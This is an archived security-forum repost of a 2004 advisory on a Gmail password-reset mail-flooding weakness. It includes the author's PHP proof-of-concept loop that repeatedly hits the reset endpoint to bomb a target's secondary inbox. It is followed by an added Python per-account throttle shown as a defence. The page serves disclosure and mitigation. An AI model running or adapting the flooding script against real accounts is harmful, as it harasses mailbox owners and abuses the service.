EvilOctal Information Security Team Technical Discussion Group's Archiver

EvilOctal 2005-1-4 06:22

[Repost] GMail E-Mail Bomber: Analysis of How the Mail Bomb Works

Source: securitytracker.com

---------------------------------------------------------------------------
GMail E-Mail Bomber
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GMail - Gmail is an experiment in a new kind of webmail, built on the idea
that you should never have to delete mail and you should always be able to
find the message you want

Web : http://gmail.google.com

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

A. E-Mail Bomber

The problem is the following: if any GMail user forgets the password,
he/she can answer a question or have a password reset confirmation e-mail
sent to his/her secondary e-mail addresses. Well, with GMail we can flood
the secondary e-mail box of GMail users.

I wrote a very basic Proof Of Concept in PHP :

<?php
/******************************************
*
* GMail bomber Proof Of Concept
* Date time : Sun. Sep-26-2004
* Author : Jose Antonio Coret
* E-Mail :
* joxeankoret@yahoo.es
* joxean.piti@gmail.com
*
******************************************/

$gmail_account = "any.gmail.address@gmail.com";
$google_cgi = "https://www.google.com/accounts/VerifySecretAnswer";
$google_cgi_params = "?continue=http://gmail.google.com/gmail&service=mail&Email=$gmail_account&SendEmail=true&IdentityAnswer=";
$emails_to_send = 15;
$bomber_url = "$google_cgi$google_cgi_params";

echo("GMail bomber\n");
echo("P.O.C. provided by Jose Antonio Coret (Joxean Koret)\n\n");
echo("Starting flood against $gmail_account ... \n\n");

for ($i = 0; $i < $emails_to_send; $i++)
{
    echo("Sending e-mail number " . ($i + 1) . " ... ");
    $fd = fopen($bomber_url, "r");
    fclose($fd);
    echo("Ok.\n");
}

echo("\n");
echo("Finish...\n");
?>


The fix:
~~~~~~~~

The vendor was contacted on Sun, 26 Sep 2004 21:11:55 but the problem
still remains unfixed as of Sun, 26 Dec 2004.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
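
---------------------------------------------------------------------------

The advisory's issue is that every unauthenticated request to the reset endpoint produces another confirmation e-mail. One way a service can bound that, shown as an added example that is not part of the original advisory or of the vendor's code; the class name, the 300-second cooldown, the cap of 3 mails per 24 hours and the sample address are assumptions:

```python
import time
from collections import defaultdict, deque


class ResetMailThrottle:
    """Per-account limit on password-reset confirmation e-mails (hypothetical helper)."""

    def __init__(self, cooldown=300, daily_cap=3, clock=time.time):
        self.cooldown = cooldown        # assumed: minimum seconds between two mails
        self.daily_cap = daily_cap      # assumed: maximum mails per rolling 24 hours
        self.clock = clock
        self.sent = defaultdict(deque)  # normalized account -> send timestamps

    def allow(self, account):
        """Return True if a reset mail may be sent now, and record the send."""
        key = account.strip().lower()   # "User@x" and "user@x " share one budget
        now = self.clock()
        history = self.sent[key]
        while history and now - history[0] >= 86400:
            history.popleft()           # forget sends older than 24 hours
        if history and now - history[-1] < self.cooldown:
            return False                # still inside the cooldown window
        if len(history) >= self.daily_cap:
            return False                # daily budget for this account is spent
        history.append(now)
        return True


def handle_reset_request(throttle, account, send_mail):
    """Answer every request identically; only call send_mail when allowed."""
    if throttle.allow(account):
        send_mail(account)
    return "If the account exists, a confirmation e-mail has been sent."


def replay_poc_pattern(requests=15, spacing=1.0):
    """Constructed input: repeated requests for one account, like the PoC loop."""
    t = [0.0]                           # fake clock so the replay runs instantly
    throttle = ResetMailThrottle(clock=lambda: t[0])
    delivered = []
    for _ in range(requests):
        handle_reset_request(throttle, "User@example.com", delivered.append)
        t[0] += spacing
    return len(delivered)


if __name__ == "__main__":
    print(replay_poc_pattern())         # mails delivered out of 15 requests
```

The throttle is keyed on the target account rather than the client address, so spreading requests across many sources does not raise the number of mails one mailbox receives.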

© 1999-2008 EvilOctal Security Team